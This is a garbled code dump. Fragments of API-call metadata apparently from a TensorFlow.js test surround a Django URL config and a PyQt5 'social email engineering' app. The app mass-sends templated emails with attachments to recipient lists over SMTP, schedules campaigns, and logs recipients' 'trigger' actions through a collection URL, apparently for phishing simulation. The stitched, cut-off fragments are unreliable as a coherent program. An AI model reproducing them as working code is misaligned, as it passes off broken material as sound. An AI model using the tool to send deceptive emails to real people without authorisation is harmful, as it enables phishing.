'"""model.json"""'], {}), "(output_dir, 'model.json')\n", (15792, 15818), False, 'import os\n'), ((15969, 16005), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (15981, 16005), False, 'import os\n'), ((16612, 16650), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (16624, 16650), False, 'import os\n'), ((16801, 16837), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (16813, 16837), False, 'import os\n'), ((17506, 17544), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (17518, 17544), False, 'import os\n'), ((18223, 18259), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (18235, 18259), False, 'import os\n'), ((18865, 18903), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (18877, 18903), False, 'import os\n'), ((19054, 19090), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (19066, 19090), False, 'import os\n'), ((20017, 20058), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (20029, 20058), False, 'import os\n'), ((21284, 21325), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (21296, 21325), False, 'import os\n'), ((24123, 24154), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (24137, 24154), False, 'import os\n'), ((24548, 24575), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (24562, 24575), False, 'import os\n'), ((25808, 25839), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (25822, 25839), False, 'import os\n'), ((26233, 26260), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (26247, 26260), False, 'import os\n'), ((27452, 27478), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (27470, 27478), True, 'import tensorflow as tf\n'), ((29332, 29350), 'os.path.getsize', 'os.path.getsize', (['f'], {}), '(f)\n', (29347, 29350), False, 'import os\n'), ((33392, 33443), 'os.path.join', 'os.path.join', (['layers_model_output_dir', '"""model.json"""'], {}), "(layers_model_output_dir, 'model.json')\n", (33404, 33443), False, 'import os\n'), ((33634, 33677), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""model.json"""'], {}), "(graph_model_dir, 'model.json')\n", (33646, 33677), False, 'import os\n'), ((33725, 33768), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""group*.bin"""'], {}), "(graph_model_dir, 'group*.bin')\n", (33737, 33768), False, 'import os\n'), ((6478, 6519), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (6490, 6519), False, 'import os\n'), ((8014, 8024), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8022, 8024), True, 'import tensorflow as tf\n'), ((8273, 8283), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8281, 8283), True, 'import tensorflow as tf\n'), ((9794, 9804), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (9802, 9804), True, 'import tensorflow as tf\n'), ((10338, 10379), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (10350, 10379), False, 'import os\n'), ((12227, 12237), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (12235, 12237), True, 'import tensorflow as tf\n'), ((12799, 12840), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (12811, 12840), False, 'import os\n'), ((19344, 19354), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (19352, 19354), True, 'import tensorflow as tf\n'), ((20252, 20262), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20260, 20262), True, 'import tensorflow as tf\n'), ((20693, 20703), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20701, 20703), True, 'import tensorflow as tf\n'), ((21175, 21185), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (21183, 21185), True, 'import tensorflow as tf\n'), ((23289, 23299), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (23297, 23299), True, 'import tensorflow as tf\n'), ((24877, 24887), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (24885, 24887), True, 'import tensorflow as tf\n'), ((26561, 26571), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (26569, 26571), True, 'import tensorflow as tf\n'), ((27548, 27558), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (27556, 27558), True, 'import tensorflow as tf\n'), ((28957, 29000), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (28969, 29000), False, 'import os\n'), ((29212, 29257), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (29224, 29257), False, 'import os\n'), ((29899, 29944), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""model.json"""'], {}), "(sharded_model_dir, 'model.json')\n", (29911, 29944), False, 'import os\n'), ((30051, 30061), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30059, 30061), True, 'import tensorflow as tf\n'), ((30386, 30396), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30394, 30396), True, 'import tensorflow as tf\n'), ((31769, 31812), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (31781, 31812), False, 'import os\n'), ((32022, 32067), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (32034, 32067), False, 'import os\n'), ((12110, 12147), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (12122, 12147), False, 'import os\n'), ((14555, 14592), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (14567, 14592), False, 'import os\n'), ((27879, 27889), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (27886, 27889), True, 'import numpy as np\n'), ((30717, 30727), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (30724, 30727), True, 'import numpy as np\n'), ((3345, 3461), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', ([], {'inputs': "{'x': x}", 'outputs': "{'output': output}"}), "(inputs={\n 'x': x}, outputs={'output': output})\n", (3411, 3461), True, 'import tensorflow as tf\n')]
from django.conf import settings from django.conf.urls.static import static from django.contrib import admin from django.urls import path, include, re_path from django.views.generic import TemplateView urlpatterns = [ path('api-auth/', include('rest_framework.urls')), path('rest-auth/', include('rest_auth.urls')), path('rest-auth/registration/', include('rest_auth.registration.urls')), path('admin/', admin.site.urls), path('api/', include('core.api.urls')), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if not settings.DEBUG: urlpatterns += [re_path(r'^.*', TemplateView.as_view(template_name='index.html'))]
[ "django.conf.urls.static.static", "django.views.generic.TemplateView.as_view", "django.urls.path", "django.urls.include" ]
[((406, 437), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (410, 437), False, 'from django.urls import path, include, re_path\n'), ((524, 585), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (530, 585), False, 'from django.conf.urls.static import static\n'), ((241, 271), 'django.urls.include', 'include', (['"""rest_framework.urls"""'], {}), "('rest_framework.urls')\n", (248, 271), False, 'from django.urls import path, include, re_path\n'), ((297, 322), 'django.urls.include', 'include', (['"""rest_auth.urls"""'], {}), "('rest_auth.urls')\n", (304, 322), False, 'from django.urls import path, include, re_path\n'), ((361, 399), 'django.urls.include', 'include', (['"""rest_auth.registration.urls"""'], {}), "('rest_auth.registration.urls')\n", (368, 399), False, 'from django.urls import path, include, re_path\n'), ((456, 480), 'django.urls.include', 'include', (['"""core.api.urls"""'], {}), "('core.api.urls')\n", (463, 480), False, 'from django.urls import path, include, re_path\n'), ((701, 749), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""index.html"""'}), "(template_name='index.html')\n", (721, 749), False, 'from django.views.generic import TemplateView\n')]
#!/bin/bash # -*- coding: UTF-8 -*- # 基本控件都在这里面 from PyQt5.QtWebEngineWidgets import QWebEngineView from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView) from PyQt5.QtGui import QPalette, QColor, QBrush from PyQt5.QtCore import Qt, QDateTime from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions import qdarkstyle, sys import mylibrary.genmail as gm from GenAndSendMail import insert_send_mail from server.database import Database from server.sendmail import Smtp from server.client import Client from email import generator from pandas import DataFrame from copy import deepcopy class SubWindow(QWidget): def __init__(self): super().__init__() self.resize(400,100) self.main_layout = QGridLayout() self.setLayout(self.main_layout) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1) self.in_recipient = QLineEdit() self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5) self.btn_send = QPushButton('寄送') self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1) class MailserverUi(QMainWindow): def __init__(self): super().__init__() setConfigOption('background', '#19232D') setConfigOption('foreground', 'd') setConfigOptions(antialias = True) # self.resize(720,500) self.init_ui() self.data_smtp = [] self.data_db = [] self.data_logs = [] self.data_temp_logs = [] # self.sub_win = SubWindow() # 默認狀態欄 self.status = self.statusBar() self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: <EMAIL>") # 標題欄 self.setWindowTitle("社交郵件工程") self.setWindowOpacity(1) # 窗口透明度 self.main_layout.setSpacing(0) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_widget.setStyleSheet( """ QComboBox::item:checked { height: 12px; border: 1px solid #32414B; margin-top: 0px; margin-bottom: 0px; padding: 4px; padding-left: 0px; } """ ) def init_ui(self): # 創建視窗主部件 self.main_widget = QWidget() # 創建主部件的網格佈局 self.main_layout = QGridLayout() # 設置窗口主部件佈局為網格佈局 self.main_widget.setLayout(self.main_layout) # 創建左側部件 self.left_widget = QWidget() self.left_widget.setObjectName('left_widget') self.left_layout = QGridLayout() self.left_widget.setLayout(self.left_layout) # 創建右側部件 self.right_widget = QWidget() self.right_widget.setObjectName('right_widget') self.right_layout = QGridLayout() self.right_widget.setLayout(self.right_layout) # 左側部件在第0行第0列,佔12行3列 self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3) # 右側部件在第0行第3列,佔12行8列 self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8) # 設置視窗主部件 self.setCentralWidget(self.main_widget) # 主要功能按鈕 self.btn_sendmail = QPushButton("發送信件") self.btn_sendmail.clicked.connect(self.display_send_mail) self.btn_smtp = QPushButton("系統設定") self.btn_smtp.clicked.connect(self.display_smtp_setting) self.btn_db = QPushButton("資料庫設定") self.btn_db.clicked.connect(self.display_db_setting) self.btn_update_eml = QPushButton("修改樣板") self.btn_update_eml.clicked.connect(self.display_update_eml) self.btn_get_logs = QPushButton("觸發明細") self.btn_get_logs.clicked.connect(self.display_logs) self.btn_download_logs = QPushButton("下載觸發明細") self.btn_download_logs.clicked.connect(self.logs_download) self.quit_btn = QPushButton("退出") self.quit_btn.clicked.connect(self.quit_act) self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3) self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3) self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3) self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3) self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3) self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3) self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3) # 主要功能查詢 self.in_data = QLineEdit() self.in_data.setPlaceholderText("暫無") self.left_layout.addWidget(self.in_data, 1, 0, 1, 3) # 主要功能 log self.query_result = QTableWidget() self.left_layout.addWidget(self.query_result, 9, 0, 2, 3) self.query_result.verticalHeader().setVisible(False) self.right_display = GraphicsLayoutWidget() self.right_layout.addWidget(self.right_display, 0, 3, 12, 8) # 右側物件: sendmail self.in_eml_type = QLineEdit() self.in_eml_template = QLineEdit() self.btn_eml_browse = QPushButton('瀏覽') self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template)) self.in_recipient_group = QLineEdit() self.in_recipient_excel = QLineEdit() self.btn_recipient_browse = QPushButton('瀏覽') self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel)) self.in_annex_file = QLineEdit() self.btn_annex_file = QPushButton('瀏覽') self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file)) self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime()) self.in_scheduler.setCalendarPopup(True) self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm') self.cb_scheduler = QCheckBox('使用') self.btn_sendmail_start = QPushButton('執行') self.btn_sendmail_start.clicked.connect(self.send_mail) # 右側物件: smtp self.in_smtp_host = QLineEdit() self.in_smtp_port = QLineEdit() self.in_smtp_user = QLineEdit() self.in_smtp_password = QLineEdit() self.cb_smtp_ssl = QCheckBox('使用') self.in_smtp_test = QLineEdit() self.btn_smtp_save = QPushButton('儲存') self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp)) self.btn_smtp_test = QPushButton('測試') self.btn_smtp_test.clicked.connect(self.show_sub_win) # 右側物件: db self.in_db_host = QLineEdit() self.in_db_port = QLineEdit() self.in_db_user = QLineEdit() self.in_db_password = QLineEdit() self.in_db_database = QLineEdit() self.in_db_domain = QLineEdit() self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址') self.btn_db_save = QPushButton('儲存') self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db)) # 右側物件: update eml self.in_edit_sender = QLineEdit() self.in_edit_sender_name = QLineEdit() self.cb_edit_annex = QCheckBox('是') self.in_edit_annex = QLineEdit() self.btn_edit_annex = QPushButton('瀏覽') self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex)) self.in_edit_subject = QLineEdit() self.mail_tab = QTabWidget() self.mail_tab.setDocumentMode(True) self.mail_tab.currentChanged.connect(self.print_html) self.mail_tab_1 = QWidget() self.mail_tab_2 = QWidget() self.mail_tab.addTab(self.mail_tab_1, 'Html') self.mail_tab.addTab(self.mail_tab_2, 'Web') self.tab_1 = QGridLayout() self.tab_2 = QGridLayout() self.tab_1.setContentsMargins(0,0,0,0) self.tab_2.setContentsMargins(0,0,0,0) self.mail_tab_1.setLayout(self.tab_1) self.mail_tab_2.setLayout(self.tab_2) self.in_edit_html = QTextEdit() self.in_edit_web = QWebEngineView() self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1) self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1) self.btn_edit_eml_reset = QPushButton('清除') self.btn_edit_eml_reset.clicked.connect(self.eml_reset) self.btn_edit_eml_read = QPushButton('讀取') self.btn_edit_eml_read.clicked.connect(self.eml_open) self.btn_edit_eml_save = QPushButton('儲存') self.btn_edit_eml_save.clicked.connect(self.eml_save) # 右側物件: logs self.tbw_logs = QTableWidget() self.tbw_logs.verticalHeader().setVisible(False) self.cmb_logs_choice = QComboBox() self.in_logs_data = QLineEdit() self.in_logs_data.setPlaceholderText("輸入資料") self.btn_logs_search = QPushButton('執行') self.btn_logs_search.clicked.connect(self.logs_change) def display_send_mail(self): self.clear_layout(self.right_layout) labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7) self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6) self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1) self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7) self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1) self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6) self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1) self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6) self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1) self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2) def display_smtp_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7) self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2) self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2) def display_db_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7) self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7) self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2) def display_update_eml(self): self.clear_layout(self.right_layout) labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"] for i, label in enumerate(labels): self.label = QLabel(label) self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7) self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7) self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7) self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1) self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7) self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7) self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2) def display_logs(self): self.data_temp_logs = [] self.tbw_logs.setRowCount(0) self.clear_layout(self.right_layout) self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8) self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1) self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2) self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3) self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2) try: db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database() self.data_logs = db.get_logs() self.data_temp_logs = deepcopy(self.data_logs) if self.data_logs: row_num = len(self.data_logs) col_num = len(self.data_logs[0]) col_lst = list(self.data_logs[0].keys()) self.cmb_logs_choice.clear() self.cmb_logs_choice.addItems(col_lst) self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents) self.tbw_logs.setHorizontalHeaderLabels(col_lst) for i in range(row_num): row_data = list(self.data_logs[i].values()) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(i, j, item) except: QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok) else: db.__disconnect__() def get_items_from_layout(self, layout): return [layout.itemAt(i).widget() for i in range(layout.count())] def save_data(self, data): items = self.get_items_from_layout(self.right_layout) data.clear() try: for item in items: if type(item) == type(QLineEdit()): data.append(item.text()) elif type(item) == type(QCheckBox()): data.append(item.isChecked()) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) print(data) def clear_layout(self, layout): for i in reversed(range(layout.count())): layout.itemAt(i).widget().setParent(None) def open_eml(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") obj.setText(file_name) def open_excel(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)") obj.setText(file_name) def open_word(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)") obj.setText(file_name) def open_annex(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)") org_files = obj.text() all_files = org_files + ',' + file_name if org_files else file_name obj.setText(all_files) def print_html(self, index): if index: self.in_edit_web.setHtml(self.in_edit_html.toPlainText()) def send_mail(self): eml_type = self.in_eml_type.text() eml_file = self.in_eml_template.text() user_group = self.in_recipient_group.text() mail_excel = self.in_recipient_excel.text() annex_file = self.in_annex_file.text() url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com' try: if self.cb_scheduler.isChecked(): my_time = self.in_scheduler.text()+':00' client = Client() client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time) QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok) else: sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp() db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database() insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url) sm.close() db.__disconnect__() QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def show_sub_win(self): if self.data_smtp: self.sub_win = SubWindow() self.sub_win.btn_send.clicked.connect(self.send_test) self.sub_win.show() else: QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok) def send_test(self): try: if self.data_smtp: mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5]) error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text()) mailserver.close() if error: QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok) else: QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) self.sub_win.in_recipient.clear() except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def eml_open(self): self.in_edit_html.clear() file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") if not file_name: return header, html = gm.get_msg(file_name) self.in_edit_sender.setText(header[2]) self.in_edit_sender_name.setText(header[1]) self.in_edit_subject.setText(header[0]) self.in_edit_html.insertPlainText(html) def eml_save(self): header, msg = [], '' header.append(self.in_edit_subject.text()) header.append(self.in_edit_sender_name.text()) header.append(self.in_edit_sender.text()) header.append('<EMAIL>') annex_file = self.in_edit_annex.text().split(',') html = self.in_edit_html.toPlainText() if not any(header[:3]) or not html: return try: msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html) file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)') with open(file_path, 'w') as outfile: gen = generator.Generator(outfile) gen.flatten(msg) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) def eml_reset(self): items = self.get_items_from_layout(self.right_layout) for item in items: if type(item) == type(QLineEdit()): item.clear() self.cb_edit_annex.setChecked(False) self.in_edit_html.clear() def logs_change(self): if not self.data_logs or not self.in_logs_data.text(): return self.data_temp_logs = [] self.tbw_logs.setRowCount(0) # header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'} condition = self.cmb_logs_choice.currentText() content = self.in_logs_data.text() row_num = len(self.data_logs) col_num = len(self.data_logs[0]) # self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) for i in range(row_num): switch = False if condition == 'date' and content in str(self.data_logs[i][condition]): switch = True elif self.data_logs[i][condition] == content: switch = True if switch: self.tbw_logs.insertRow(self.tbw_logs.rowCount()) row_data = list(self.data_logs[i].values()) self.data_temp_logs.append(self.data_logs[i]) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item) def logs_download(self): if self.data_temp_logs: try: file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)') if not file_path: return df = DataFrame(self.data_temp_logs) df.to_excel(file_path, index=False) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) else: QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok) def quit_act(self): # sender 是发送信号的对象 sender = self.sender() print(sender.text() + '键被按下') qApp = QApplication.instance() qApp.quit() def main(): app = QApplication(sys.argv) gui = MailserverUi() gui.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
[ "PyQt5.QtGui.QColor", "PyQt5.QtWidgets.QApplication", "copy.deepcopy", "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "PyQt5.QtWidgets.QTableWidget", "PyQt5.QtWidgets.QTextEdit", "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "email.generator.Generator", "PyQt5.QtWidgets.QComboBox", "PyQt5.QtCore.QDateTime.currentDateTime", "qdarkstyle.load_stylesheet_pyqt5", "GenAndSendMail.insert_send_mail", "PyQt5.QtWidgets.QLabel", "pandas.DataFrame", "PyQt5.QtWidgets.QPushButton", "PyQt5.QtWidgets.QLineEdit", "PyQt5.QtWidgets.QWidget", "PyQt5.QtWidgets.QApplication.instance", "mylibrary.genmail.get_msg", "PyQt5.QtWebEngineWidgets.QWebEngineView", "PyQt5.QtWidgets.QMessageBox.information", "pyqtgraph.setConfigOptions", "PyQt5.QtWidgets.QGridLayout", "server.sendmail.Smtp", "server.client.Client", "PyQt5.QtWidgets.QTabWidget", "PyQt5.QtWidgets.QCheckBox", "mylibrary.genmail.gen_eml", "pyqtgraph.GraphicsLayoutWidget", "pyqtgraph.setConfigOption", "server.database.Database", "PyQt5.QtWidgets.QMessageBox.warning" ]
[((22731, 22753), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (22743, 22753), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((986, 999), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (997, 999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1196, 1207), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (1205, 1207), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, 